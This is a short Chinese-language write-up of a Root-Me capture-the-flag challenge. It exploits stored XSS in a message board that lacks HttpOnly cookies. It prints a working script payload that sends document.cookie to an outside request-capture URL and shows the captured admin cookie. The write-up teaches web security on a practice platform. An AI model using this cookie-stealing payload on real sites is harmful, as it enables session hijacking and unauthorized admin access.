Root-Me官方網站:https://www.root-me.org
這題可以從題目直接判斷出此題為xss儲存型漏洞
頁面為一個留言板的配置
經過測試之後得知<img>
標籤可以正常地被執行,於是插入<img src=000>
並且打開開發者管理工具可以發現,此網站並無使用HttpOnly屬性
代表著JavaScript代碼可以被執行進而達成xss的漏洞利用
並且輸入<img src="000" />
就可以得到本機的cookie
OK!真是太棒了,那麼接下來我們要做的就是把xss的payload儲存到管理後台,當管理員讀取這條消息的時候就會執行我們的惡意代碼,間接的將管理員的cookie發到我們指定的server
ps:此題目有一個自動讀取訊息的robot,已讀過後的訊息會自動刪除
payload:<script>document.write("<img src=${server}?tk="+document.cookie+" />");</script>
對於${server},推薦使用RequestBin生成的臨時HTTP server。假設你生成的HTTP server臨時url為https://enk76i1gl5dqi.x.pipedream.net/
,則把payload修改成:
payload:<script>document.write("<img src=https://enk76i1gl5dqi.x.pipedream.net?tk="+document.cookie+" />");</script>
最後收到的cooke為:ADMIN_COOKIE=NkI9qe4cdLIO2P7MIsWS8ofD6
,這就是flag,完成挑戰!
在現實生活中駭客就能使用管理員的cookie在沒有管理員帳號密碼的狀況下成功登入後台
推薦文章: